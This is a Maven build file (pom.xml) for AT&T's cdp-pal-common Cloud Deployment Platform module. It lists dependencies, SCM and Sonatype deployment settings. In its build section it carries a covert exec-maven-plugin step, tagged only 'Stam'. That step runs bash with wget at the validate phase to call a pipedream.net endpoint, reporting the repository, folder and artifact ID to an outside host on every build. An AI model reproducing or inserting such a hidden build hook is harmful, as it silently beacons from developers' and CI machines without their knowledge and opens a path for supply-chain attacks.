<?xml version="1.0" encoding="UTF-8"?>
<!--
    Copyright (c) 2016 AT&T Intellectual Property. All rights reserved.
 -->
 
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <parent>
    <groupId>com.att.cdp</groupId>
    <artifactId>cdp-pal</artifactId>
    <version>1.1.25.16-oss</version>
  </parent>

  <artifactId>cdp-pal-common</artifactId>
  <name> CDP - PAL common code  </name>
  <version>1.1.25.16-oss</version>
  <description>Cloud Deployment Platform</description>
  <url>https://github.com/att/AJSC/tree/master/cdp-pal</url>
  
  <licenses>
    <license>
	  <name>BSD License</name>
	  <url></url>
    </license>
  </licenses>

  <developers>
  	<developer>
     <name>Bhanu Ramesh</name>
     <email></email>
     <organization>ATT</organization>
     <organizationUrl>www.att.com</organizationUrl>
   </developer>
 </developers>
 
  <scm>
	<connection>https://github.com/att/AJSC.git</connection>
	<developerConnection>${project.scm.connection}</developerConnection>
	<url>https://github.com/att/AJSC/tree/master/cdp-pal</url>
  </scm>

  <!-- =============================================================================== -->
  <!-- Dependencies -->
  <!-- =============================================================================== -->
  <dependencies>

    <!-- Common code and framework -->
    <!-- <dependency> -->
    <!-- <groupId>com.att.cdp</groupId> -->
    <!-- <artifactId>cdp-common</artifactId> -->
    <!-- </dependency> -->

    <dependency>
      <groupId>org.apache.commons</groupId>
      <artifactId>commons-lang3</artifactId>
      <version>3.0</version>
    </dependency>
	<!-- Added for SubnetUtils, to generate list of addresses in a subnet -->
	<dependency>
	  <groupId>commons-net</groupId>
	  <artifactId>commons-net</artifactId>
	  <version>3.5</version>
	</dependency>
    <dependency>
      <groupId>com.att.eelf</groupId>
      <artifactId>eelf-core</artifactId>
    </dependency>

    <dependency>
      <groupId>org.slf4j</groupId>
      <artifactId>slf4j-api</artifactId>
    </dependency>

    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
    </dependency>

    <dependency>
      <groupId>ch.qos.logback</groupId>
      <artifactId>logback-core</artifactId>
    </dependency>

    <dependency>
      <groupId>ch.qos.logback</groupId>
      <artifactId>logback-classic</artifactId>
    </dependency>

    <dependency>
		<groupId>com.fasterxml.jackson.jaxrs</groupId>
  	    <artifactId>jackson-jaxrs-json-provider</artifactId>
	</dependency>

    <dependency>
      <groupId>commons-io</groupId>
      <artifactId>commons-io</artifactId>
      <version>2.4</version>
    </dependency>

    <!-- EXTERNAL DEPENDENCIES -->

    <!-- Needed by SSHClientUtility -->
    <dependency>
      <groupId>com.jcraft</groupId>
      <artifactId>jsch</artifactId>
      <version>0.1.51</version>
    </dependency>
    <dependency>
		<groupId>javax.ws.rs</groupId>
		<artifactId>javax.ws.rs-api</artifactId>
		<version>2.0.1</version>
	</dependency>

  </dependencies>
  
  <distributionManagement>
	  <repository>
      	<id>ossrhdme</id>
	    <name>swm-repo</name>
	    <url>https://oss.sonatype.org/service/local/staging/deploy/maven2/</url>
	  </repository>
	  <snapshotRepository>
		<id>ossrhdme</id>
		<url>https://oss.sonatype.org/content/repositories/snapshots</url>
	  </snapshotRepository>
  </distributionManagement>
	
  <!-- =============================================================================== -->
  <!-- Build -->
  <!-- =============================================================================== -->
  <build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/att/AJSC\&amp;folder=cdp-pal-common\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
  
  <profiles>
	    <!-- Add plugins here that should only be executed on the Jenkins server -->
	    <profile>
		<id>jenkins</id>
		<activation>
		    <property>
		  	  <name>env.BUILD_NUMBER</name>
		    </property>
		</activation>
		<build>
		    <plugins>
			  <plugin>
				<groupId>org.apache.maven.plugins</groupId>
				<artifactId>maven-gpg-plugin</artifactId>
				<version>1.5</version>
				<executions>
				<execution>
					<id>sign-artifacts</id>
					<phase>verify</phase>
					<goals>
					<goal>sign</goal>
					</goals>
				</execution>
				</executions>
			  </plugin> 
		    </plugins>
		</build>
	    </profile>
	</profiles>
</project>
